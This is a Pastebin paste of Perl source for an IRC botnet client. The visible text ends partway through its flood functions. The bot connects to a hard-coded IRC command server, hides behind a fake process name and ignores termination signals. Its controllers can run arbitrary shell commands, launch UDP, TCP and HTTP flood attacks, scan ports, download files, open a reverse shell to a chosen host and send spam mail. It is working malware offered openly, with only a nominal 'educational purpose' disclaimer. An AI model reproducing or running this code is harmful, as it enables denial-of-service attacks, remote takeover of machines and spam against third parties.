Advertisement
Guest User

Untitled

a guest
Jul 26th, 2017
101
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 33.61 KB | None | 0 0
  1. #!/usr/bin/perl
  2.  
  3. ######################################################################################################################
  4. ######################################################################################################################
  5. ## Linux-Help Perl IrcBot v1.0 / 2013 by Linux-help @ UnderNet ## [ Help ] ###########################################
  6. ## Stealth MultiFunctional IrcBot writen in Perl #######################################################
  7. ## Teste on every system with PERL instlled ## !u @system ##
  8. ## ## !u @version ##
  9. ## This is a free program used on your own risk. ## !u @channel ##
  10. ## Created for educational purpose only. ## !u @flood ##
  11. ## I'm not responsible for the illegal use of this program. ## !u @utils ##
  12. ######################################################################################################################
  13. ## [ Channel ] #################### [ Flood ] ################################## [ Utils ] ###########################
  14. ######################################################################################################################
  15. ## !u @join <#channel> ## !u @udp1 <ip> <port> <time> ## !u @cback <ip> <port> ##
  16. ## !u @part <#channel> ## !u @udp2 <ip> <packet size> <time> ## !u @downlod <url+path> <file> ##
  17. ## !u !uejoin <#channel> ## !u @udp3 <ip> <port> <time> ## !u @portscan <ip> ##
  18. ## !u !op <channel> <nick> ## !u @tcp <ip> <port> <packet size> <time> ## !u @mail <subject> <sender> ##
  19. ## !u !deop <channel> <nick> ## !u @http <site> <time> ## <recipient> <message> ##
  20. ## !u !voice <channel> <nick> ## ## !u pwd;uname -a;id <for example> ##
  21. ## !u !devoice <channel> <nick> ## !u @ctcpflood <nick> ## !u @port <ip> <port> ##
  22. ## !u !nick <newnick> ## !u @msgflood <nick> ## !u @dns <ip/host> ##
  23. ## !u !msg <nick> ## !u @noticeflood <nick> ## ##
  24. ## !u !quit ## ## ##
  25. ## !u !uaw ## ## ##
  26. ## !u @die ## ## ##
  27. ## ## ## ##
  28. ######################################################################################################################
  29. ######################################################################################################################
  30.  
  31. #############################
  32. ##### [ Configuration ] #####
  33. #############################
  34.  
  35. my @rps = ("/usr/sbin/test");
  36. my $process = $rps[rand scalar @rps];
  37.  
  38. my @rversion = ("\001VERSION - unknown command.\001",
  39. "\001mIRC v5.91 K.Mardam-Bey\001",
  40. "\001mIRC v6.2 Khaled Mardam-Bey\001",
  41. "\001mIRC v6.03 Khaled Mardam-Bey\001",
  42. "\001mIRC v6.14 Khaled Mardam-Bey\001",
  43. "\001mIRC v6.15 Khaled Mardam-Bey\001",
  44. "\001mIRC v6.16 Khaled Mardam-Bey\001",
  45. "\001mIRC v6.17 Khaled Mardam-Bey\001",
  46. "\001mIRC v6.21 Khaled Mardam-Bey\001",
  47. "\001mIRC v6.31 Khaled Mardam-Bey\001",
  48. "\001mIRC v7.15 Khaled Mardam-Bey\001");
  49. my $vers = $rversion[rand scalar @rversion];
  50.  
  51. my @rircname = ("game");
  52.  
  53. my $ircname = $rircname[rand scalar @rircname];
  54.  
  55. ## my @rrealname = ("4,1[ #LinuX help la puloc ]",
  56. ## "4,1 /!\ #LinuX help la puloc /!\ ",
  57. ## "12,1<///8,1///4,1###>",
  58. ## "2,1---=== 4,1 #LinuX help la puloc 2,1===---");
  59. ## chop (my $realname = $rrealname[rand scalar @rrealname]);
  60.  
  61. chop (my $realname = $rircname[rand scalar @rircname]);
  62.  
  63. ## my @nickname = ("Linux[U]");
  64. ## my $nick =$nickname[rand scalar @nickname];
  65.  
  66. my $nick =$rircname[rand scalar @rircname];
  67.  
  68. $server = 'Game.ftp.sh' unless $server;
  69. my $port = '6667';
  70.  
  71. my $linas_max='8';
  72. my $sleep='5';
  73.  
  74. my $homedir = "/tmp";
  75. my $version = '#Linux-Help puloc versiunea 0';
  76.  
  77. my @admins = ("BaT","Root" );
  78. my @hostauth=("Root","BaT");
  79. my @channels = ("#Perl");
  80.  
  81. my $pacotes = 1;
  82.  
  83. #################################################################
  84. ##### [ Stop Editing if you dont know what are you doing. ] #####
  85. #################################################################
  86.  
  87. $SIG{'INT'} = 'IGNORE';
  88. $SIG{'HUP'} = 'IGNORE';
  89. $SIG{'TERM'} = 'IGNORE';
  90. $SIG{'CHLD'} = 'IGNORE';
  91. $SIG{'PS'} = 'IGNORE';
  92.  
  93. use Socket;
  94. use IO::Socket;
  95. use IO::Socket::INET;
  96. use IO::Select;
  97.  
  98. chdir("$homedir");
  99.  
  100. $server="$ARGV[0]" if $ARGV[0];
  101. $0="$process"."\0"x16;;
  102. my $pid=fork;
  103. exit if $pid;
  104. die "Can't fork in background: $!" unless defined($pid);
  105.  
  106. our %irc_servers;
  107. our %DCC;
  108. my $dcc_sel = new IO::Select->new();
  109. $sel_cliente = IO::Select->new();
  110. sub sendraw {
  111. if ($#_ == '1') {
  112. my $socket = $_[0];
  113. print $socket "$_[1]\n";
  114. } else {
  115. print $IRC_cur_socket "$_[0]\n";
  116. }
  117. }
  118.  
  119. sub getstore ($$)
  120. {
  121. my $url = shift;
  122. my $file = shift;
  123. $http_stream_out = 1;
  124. open(GET_OUTFILE, "> $file");
  125. %http_loop_check = ();
  126. _get($url);
  127. close GET_OUTFILE;
  128. return $main::http_get_result;
  129. }
  130.  
  131. sub _get
  132. {
  133. my $url = shift;
  134. my $proxy = "";
  135. grep {(lc($_) eq "http_proxy") && ($proxy = $ENV{$_})} keys %ENV;
  136. if (($proxy eq "") && $url =~ m,^http://([^/:]+)(?::(\d+))?(/\S*)?$,) {
  137. my $host = $1;
  138. my $port = $2 || 80;
  139. my $path = $3;
  140. $path = "/" unless defined($path);
  141. return _trivial_http_get($host, $port, $path);
  142. } elsif ($proxy =~ m,^http://([^/:]+):(\d+)(/\S*)?$,) {
  143. my $host = $1;
  144. my $port = $2;
  145. my $path = $url;
  146. return _trivial_http_get($host, $port, $path);
  147. } else {
  148. return undef;
  149. }
  150. }
  151.  
  152.  
  153. sub _trivial_http_get
  154. {
  155. my($host, $port, $path) = @_;
  156. my($AGENT, $VERSION, $p);
  157. $AGENT = "get-minimal";
  158. $VERSION = "20000118";
  159. $path =~ s/ /%20/g;
  160.  
  161. require IO::Socket;
  162. local($^W) = 0;
  163. my $sock = IO::Socket::INET->new(PeerAddr => $host,
  164. PeerPort => $port,
  165. Proto => 'tcp',
  166. Timeout => 60) || return;
  167. $sock->autoflush;
  168. my $netloc = $host;
  169. $netloc .= ":$port" if $port != 80;
  170. my $request = "GET $path HTTP/1.0\015\012"
  171. . "Host: $netloc\015\012"
  172. . "User-Agent: $AGENT/$VERSION/u\015\012";
  173. $request .= "Pragma: no-cache\015\012" if ($main::http_no_cache);
  174. $request .= "\015\012";
  175. print $sock $request;
  176.  
  177. my $buf = "";
  178. my $n;
  179. my $b1 = "";
  180. while ($n = sysread($sock, $buf, 8*1024, length($buf))) {
  181. if ($b1 eq "") {
  182. $b1 = $buf;
  183. $buf =~ s/.+?\015?\012\015?\012//s;
  184. }
  185. if ($http_stream_out) { print GET_OUTFILE $buf; $buf = ""; }
  186. }
  187. return undef unless defined($n);
  188. $main::http_get_result = 200;
  189. if ($b1 =~ m,^HTTP/\d+\.\d+\s+(\d+)[^\012]*\012,) {
  190. $main::http_get_result = $1;
  191. if ($main::http_get_result =~ /^30[1237]/ && $b1 =~ /\012Location:\s*(\S+)/) {
  192. my $url = $1;
  193. return undef if $http_loop_check{$url}++;
  194. return _get($url);
  195. }
  196. return undef unless $main::http_get_result =~ /^2/;
  197. }
  198.  
  199. return $buf;
  200. }
  201.  
  202. sub conectar {
  203. my $meunick = $_[0];
  204. my $server_con = $_[1];
  205. my $port_con = $_[2];
  206. my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$server_con",
  207. PeerPort=>$port_con) or return(1);
  208. if (defined($IRC_socket)) {
  209. $IRC_cur_socket = $IRC_socket;
  210. $IRC_socket->autoflush(1);
  211. $sel_cliente->add($IRC_socket);
  212. $irc_servers{$IRC_cur_socket}{'host'} = "$server_con";
  213. $irc_servers{$IRC_cur_socket}{'port'} = "$port_con";
  214. $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
  215. $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
  216. nick("$meunick");
  217. sendraw("USER $ircname ".$IRC_socket->sockhost." $server_con :$realname");
  218. sleep 1;
  219. }
  220. }
  221.  
  222. my $line_temp;
  223. while( 1 ) {
  224. while (!(keys(%irc_servers))) { conectar("$nick", "$server", "$port"); }
  225. delete($irc_servers{''}) if (defined($irc_servers{''}));
  226. my @ready = $sel_cliente->can_read(0);
  227. next unless(@ready);
  228. foreach $fh (@ready) {
  229. $IRC_cur_socket = $fh;
  230. $meunick = $irc_servers{$IRC_cur_socket}{'nick'};
  231. $nread = sysread($fh, $msg, 4096);
  232. if ($nread == 0) {
  233. $sel_cliente->remove($fh);
  234. $fh->close;
  235. delete($irc_servers{$fh});
  236. }
  237. @lines = split (/\n/, $msg);
  238. for(my $c=0; $c<= $#lines; $c++) {
  239. $line = $lines[$c];
  240. $line=$line_temp.$line if ($line_temp);
  241. $line_temp='';
  242. $line =~ s/\r$//;
  243. unless ($c == $#lines) {
  244. parse("$line");
  245. } else {
  246. if ($#lines == 0) {
  247. parse("$line");
  248. } elsif ($lines[$c] =~ /\r$/) {
  249. parse("$line");
  250. } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
  251. parse("$line");
  252. } else {
  253. $line_temp = $line;
  254. }
  255. }
  256. }
  257. }
  258. }
  259.  
  260. sub parse {
  261. my $servarg = shift;
  262. if ($servarg =~ /^PING \:(.*)/) {
  263. sendraw("PONG :$1");
  264. } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
  265. my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
  266. if ($args =~ /^\001VERSION\001$/) {
  267. notice("$pn", "".$vers."");
  268. }
  269. if (grep {$_ =~ /^\Q$hostmask\E$/i } @hostauth) {
  270. if (grep {$_ =~ /^\Q$pn\E$/i } @admins ) {
  271. if ($onde eq "$meunick"){
  272. shell("$pn", "$args");
  273. }
  274. if ($args =~ /^(\Q$meunick\E|\!u)\s+(.*)/ ) {
  275. my $natrix = $1;
  276. my $arg = $2;
  277. if ($arg =~ /^\!(.*)/) {
  278. ircase("$pn","$onde","$1");
  279. } elsif ($arg =~ /^\@(.*)/) {
  280. $ondep = $onde;
  281. $ondep = $pn if $onde eq $meunick;
  282. bfunc("$ondep","$1");
  283. } else {
  284. shell("$onde", "$arg");
  285. }
  286. }
  287. }
  288. }
  289. }
  290.  
  291. elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
  292. if (lc($1) eq lc($meunick)) {
  293. $meunick=$4;
  294. $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
  295. }
  296. } elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
  297. nick("$meunick-".int rand(9999));
  298. } elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
  299. $meunick = $2;
  300. $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
  301. $irc_servers{$IRC_cur_socket}{'nome'} = "$1";
  302. foreach my $canal (@channels) {
  303. sendraw("MODE $nick +x");
  304. sendraw("JOIN $canal");
  305. sendraw("PRIVMSG $canal :9,1E14dek 9N14daf 9?!? 14,, 9Y14alla 9B14allech 9=14))");
  306. }
  307. }
  308. }
  309.  
  310. sub bfunc {
  311. my $printl = $_[0];
  312. my $funcarg = $_[1];
  313. if (my $pid = fork) {
  314. waitpid($pid, 0);
  315. } else {
  316. if (fork) {
  317. exit;
  318. } else {
  319. ###########################
  320. ##### [ Help Module ] #####
  321. ###########################
  322.  
  323. if ($funcarg =~ /^help/) {
  324. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1======================= ");
  325. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1Linux-Help PerlBot Main Help: ");
  326. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1======================= ");
  327. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1system ");
  328. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1version ");
  329. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1channel ");
  330. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1flood ");
  331. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1utils ");
  332. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1======================= ");
  333. }
  334.  
  335. if ($funcarg =~ /^system/) {
  336. $uptime=`uptime`;
  337. $ownd=`pwd`;
  338. $id=`id`;
  339. $uname=`uname -srp`;
  340. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [System] 9,1=================== ");
  341. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [System] 9,1Bot Configuration: ");
  342. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [System] 9,1=================== ");
  343. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [System] 9,1*Server : 12$server ");
  344. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [System] 9,1*Port : 12$port ");
  345. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [System] 9,1*Channels : 12@channels ");
  346. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [System] 9,1*uname -a : 12$uname ");
  347. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [System] 9,1*uptime : 12$uptime ");
  348. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [System] 9,1*FakeProcess : 12$process ");
  349. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [System] 9,1*ProcessPID : 12$$ ");
  350. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [System] 9,1*ID : 12$id ");
  351. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [System] 9,1*Own Dir : 12$ownd ");
  352. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [System] 9,1=================== ");
  353. }
  354.  
  355. if ($funcarg =~ /^version/){
  356. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Version] 9,1================================== ");
  357. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Version] 9,1Bot Informations: ");
  358. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Version] 9,1================================== ");
  359. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Version] 9,1*Bot Version : 12$version ");
  360. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Version] 9,1*Bot Creator : 12PRG ");
  361. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Version] 9,1*Bot Year : 122013 ");
  362. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Version] 9,1================================== ");
  363. }
  364.  
  365. if ($funcarg =~ /^flood/) {
  366. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1========================================= ");
  367. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1Linux-help PerlBot Flood Help: ");
  368. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1========================================= ");
  369. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1udp1 <ip> <port> <time> ");
  370. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1udp2 <ip> <packet size> <time> ");
  371. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1udp3 <ip> <port> <time> ");
  372. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1tcp <ip> <port> <packet size> <time> ");
  373. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1http <site> <time> ");
  374. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1ctcpflood <nick> ");
  375. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1msgflood <nick> ");
  376. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1noticeflood <nick> ");
  377. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1========================================= ");
  378. }
  379.  
  380. if ($funcarg =~ /^channel/) {
  381. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1============================= ");
  382. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1Linux-Help PerlBot Channel Help: ");
  383. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1============================= ");
  384. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1join <channel> ");
  385. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1part <channel> ");
  386. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12!9,1rejoin <channel> ");
  387. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12!9,1op <channel> <nick> ");
  388. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12!9,1deop <channel> <nick> ");
  389. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12!9,1voice <channel> <nick> ");
  390. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12!9,1devoice <channel> <nick> ");
  391. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12!9,1nick <newnick> ");
  392. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12!9,1msg <nick> ");
  393. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12!9,1quit ");
  394. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12!9,1die ");
  395. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1============================= ");
  396. }
  397.  
  398. if ($funcarg =~ /^utils/) {
  399. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1================================================== ");
  400. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1Linux-Help PerlBot Utils Help: ");
  401. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1================================================== ");
  402. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1cback <ip> <port> ");
  403. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1download <url+path> <file> ");
  404. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1mail <subject> <sender> <recipient> <message> ");
  405. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1dns <ip> ");
  406. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1port <ip> <port> ");
  407. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1portscan <ip> ");
  408. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u pwd (for example) ");
  409. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1================================================== ");
  410. }
  411.  
  412. #########################
  413. ##### [ Functions ] #####
  414. #########################
  415.  
  416. if ($funcarg =~ /^die/) {
  417. sendraw($IRC_cur_socket, "QUIT :");
  418. $killd = "kill -9 ".fork;
  419. system (`$killd`);
  420. }
  421. ###########
  422. if ($funcarg =~ /^join (.*)/) {
  423. sendraw($IRC_cur_socket, "JOIN ".$1);
  424. }
  425.  
  426. if ($funcarg =~ /^part (.*)/) {
  427. sendraw($IRC_cur_socket, "PART ".$1);
  428. }
  429. ###########
  430. if ($funcarg =~ /^portscan (.*)/) {
  431. my $hostip="$1";
  432. my @portas=("1","7","9","14","20","21","22","23","25","53","80","88","110","112","113","137","143","145","222","333","405","443","444","445","512","587","616","666","993","995","1024","1025","1080","1144","1156","1222","1230","1337","1348","1628","1641","1720","1723","1763","1983","1984","1985","1987","1988","1990","1994","2005","2020","2121","2200","2222","2223","2345","2360","2500","2727","3130","3128","3137","3129","3303","3306","3333","3389","4000","4001","4471","4877","5252","5522","5553","5554","5642","5777","5800","5801","5900","5901","6062","6550","6522","6600","6622","6662","6665","6666","6667","6969","7000","7979","8008","8080","8081","8082","8181","8246","8443","8520","8787","8855","8880","8989","9855","9865","9997","9999","10000","10001","10010","10222","11170","11306","11444","12241","12312","14534","14568","15951","17272","19635","19906","19900","20000","21412","21443","21205","22022","30999","31336","31337","32768","33180","35651","36666","37998","41114","41215","44544","45055","45555","45678","51114","51247","51234","55066","55555","65114","65156","65120","65410","65500","65501","65523","65533");
  433. my (@aberta, %porta_banner);
  434. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [PortScan] 9,1Scanning for open ports on 12".$1." 9,1started. ");
  435. foreach my $porta (@portas) {
  436. my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4);
  437. if ($scansock) {
  438. push (@aberta, $porta);
  439. $scansock->close;
  440. }
  441. }
  442. if (@aberta) {
  443. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [PortScan] 9,1Open ports found: 12@aberta ");
  444. } else {
  445. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [PortScan] 9,1No open ports found. ");
  446. }
  447. }
  448. ##############
  449. if ($funcarg =~ /^download\s+(.*)\s+(.*)/) {
  450. getstore("$1", "$2");
  451. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Download] 9,1Downloaded the file: 12$2 9,1from 12$1 ");
  452. }
  453. ##############
  454. if ($funcarg =~ /^dns\s+(.*)/){
  455. my $nsku = $1;
  456. $mydns = inet_ntoa(inet_aton($nsku));
  457. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [DNS] 9,1Resolved: 12$nsku 9,1to 12$mydns ");
  458. }
  459. ##############
  460. if ($funcarg=~ /^port\s+(.*?)\s+(.*)/ ) {
  461. my $hostip= "$1";
  462. my $portsc= "$2";
  463. my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $portsc, Proto =>'tcp', Timeout => 7);
  464. if ($scansock) {
  465. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [PORT] 9,1Connection to 12$hostip9,1:12$portsc 9,1is 12Accepted. ");
  466. }
  467. else {
  468. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [PORT] 9,1Connection to 12$hostip9,1:12$portsc 9,1is 4Refused. ");
  469. }
  470. }
  471. ##############
  472. if ($funcarg =~ /^udp1\s+(.*)\s+(\d+)\s+(\d+)/) {
  473. return unless $pacotes;
  474. socket(Tr0x, PF_INET, SOCK_DGRAM, 17);
  475. my $alvo=inet_aton("$1");
  476. my $porta = "$2";
  477. my $dtime = "$3";
  478. my $pacote;
  479. my $pacotese;
  480. my $size = 0;
  481. my $fim = time + $dtime;
  482. my $pacota = 1;
  483. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [UDP-1 PRG] 9,1jary nake7 hazihi al ip :)) 12".$1." 9,1On Port 12".$porta." 9,1for 12".$dtime." 9,1seconds. ");
  484. while (($pacota == "1") && ($pacotes == "1")) {
  485. $pacota = 0 if ((time >= $fim) && ($dtime != "0"));
  486. $pacote = $size ? $size : int(rand(1024-64)+64) ;
  487. $porta = int(rand 65000) +1 if ($porta == "0");
  488. #send(Tr0x, 0, $pacote, sockaddr_in($porta, $alvo));
  489. send(Tr0x, pack("a$pacote","Tr0x"), 0, pack_sockaddr_in($porta, $alvo));
  490. }
  491. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [UDP-1 PRG] 9,1Attack for 12".$1." 9,1finished in 12".$dtime." 9,1seconds9,1. ");
  492. }
  493. ##############
  494. if ($funcarg =~ /^udp2\s+(.*)\s+(\d+)\s+(\d+)/) {
  495. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [UDP-2 PRG] 9,1Attacking 12".$1." 9,1with 12".$2." 9,1Kb Packets for 12".$3." 9,1seconds. ");
  496. my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3");
  497. $dtime = 1 if $dtime == 0;
  498. my %bytes;
  499. $bytes{igmp} = $2 * $pacotes{igmp};
  500. $bytes{icmp} = $2 * $pacotes{icmp};
  501. $bytes{o} = $2 * $pacotes{o};
  502. $bytes{udp} = $2 * $pacotes{udp};
  503. $bytes{tcp} = $2 * $pacotes{tcp};
  504. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [UDP-2 DDOS] 9,1Results 12".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." 9,1Kb in 12".$dtime." 9,1seconds to 12".$1."9,1. ");
  505. }
  506. ##############
  507. if ($funcarg =~ /^udp3\s+(.*)\s+(\d+)\s+(\d+)/) {
  508. return unless $pacotes;
  509. socket(Tr0x, PF_INET, SOCK_DGRAM, 17);
  510. my $alvo=inet_aton("$1");
  511. my $porta = "$2";
  512. my $dtime = "$3";
  513. my $pacote;
  514. my $pacotese;
  515. my $fim = time + $dtime;
  516. my $pacota = 1;
  517. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [UDP-3 PRG] 9,1Attacking 12".$1." 9,1On Port 12".$porta." 9,1for 12".$dtime." 9,1seconds. ");
  518. while (($pacota == "1") && ($pacotes == "1")) {
  519. $pacota = 0 if ((time >= $fim) && ($dtime != "0"));
  520. $pacote= $rand x $rand x $rand;
  521. $porta = int(rand 65000) +1 if ($porta == "0");
  522. send(Tr0x, 0, $pacote, sockaddr_in($porta, $alvo)) and $pacotese++ if ($pacotes == "1");
  523. }
  524.  
  525. $pacotese/1024;
  526. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [UDP-3 PRG] 9,1Results 12".$pacotese." 9,1Kb in 12".$dtime." 9,1seconds to 12".$1."9,1. ");
  527. }
  528. ##############
  529.  
  530. ##############
  531. if ($funcarg =~ /^tcp\s+(.*)\s+(\d+)\s+(\d+)/) {
  532. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [TCP PRG] 9,1Attacking 12".$1.":".$2." 9,1for 12".$3." 9,1seconds. ");
  533. my $itime = time;
  534. my ($cur_time);
  535. $cur_time = time - $itime;
  536. while ($3>$cur_time){
  537. $cur_time = time - $itime;
  538. &tcpflooder("$1","$2","$3");
  539. }
  540. sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [TCP PRG] 9,1Attack ended on: 12".$1.":".$2."9,1. ");
  541. }
  542. ##############
  543. if ($funcarg =~ /^http\s+(.*)\s+(\d+)/) {
  544. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1[HTTP PRG] 9,1Attacking 12".$1." 9,1on port 80 for 12".$2." 9,1seconds. ");
  545. my $itime = time;
  546. my ($cur_time);
  547. $cur_time = time - $itime;
  548. while ($2>$cur_time){
  549. $cur_time = time - $itime;
  550. my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80);
  551. print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
  552. close($socket);
  553. }
  554. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [HTTP PRG] 9,1Attacking ended on: 12".$1."9,1. ");
  555. }
  556. ##############
  557. if ($funcarg =~ /^cback\s+(.*)\s+(\d+)/) {
  558. my $host = "$1";
  559. my $port = "$2";
  560. my $proto = getprotobyname('tcp');
  561. my $iaddr = inet_aton($host);
  562. my $paddr = sockaddr_in($port, $iaddr);
  563. my $shell = "/bin/sh -i";
  564. if ($^O eq "MSWin32") {
  565. $shell = "cmd.exe";
  566. }
  567. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [ConnectBack] 9,1Connecting to 12$host:$port ");
  568. socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
  569. connect(SOCKET, $paddr) or die "connect: $!";
  570. open(STDIN, ">&SOCKET");
  571. open(STDOUT, ">&SOCKET");
  572. open(STDERR, ">&SOCKET");
  573. system("$shell");
  574. close(STDIN);
  575. close(STDOUT);
  576. close(STDERR);
  577. }
  578. ##############
  579. if ($funcarg =~ /^mail\s+(.*)\s+(.*)\s+(.*)\s+(.*)/) {
  580. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Mailer] 9,1Sending email to: 12$3 ");
  581. $subject = $1;
  582. $sender = $2;
  583. $recipient = $3;
  584. @corpo = $4;
  585. $mailtype = "content-type: text/html";
  586. $sendmail = '/usr/sbin/sendmail';
  587. open (SENDMAIL, "| $sendmail -t");
  588. print SENDMAIL "$mailtype\n";
  589. print SENDMAIL "Subject: $subject\n";
  590. print SENDMAIL "From: $sender\n";
  591. print SENDMAIL "To: $recipient\n\n";
  592. print SENDMAIL "@corpo\n\n";
  593. close (SENDMAIL);
  594. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Mailer] 9,1Email Sended to: 12$recipient ");
  595. }
  596. exit;
  597. }
  598. }
  599. ##############
  600. if ($funcarg =~ /^ctcpflood (.*)/) {
  601. my $target = "$1";
  602. sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [IRCFlood] 9,1CTCP Flooding: 12".$target." ");
  603. for (1..10) {
  604. sendraw($IRC_cur_socket, "PRIVMSG ".$target." :\001VERSION\001\n");
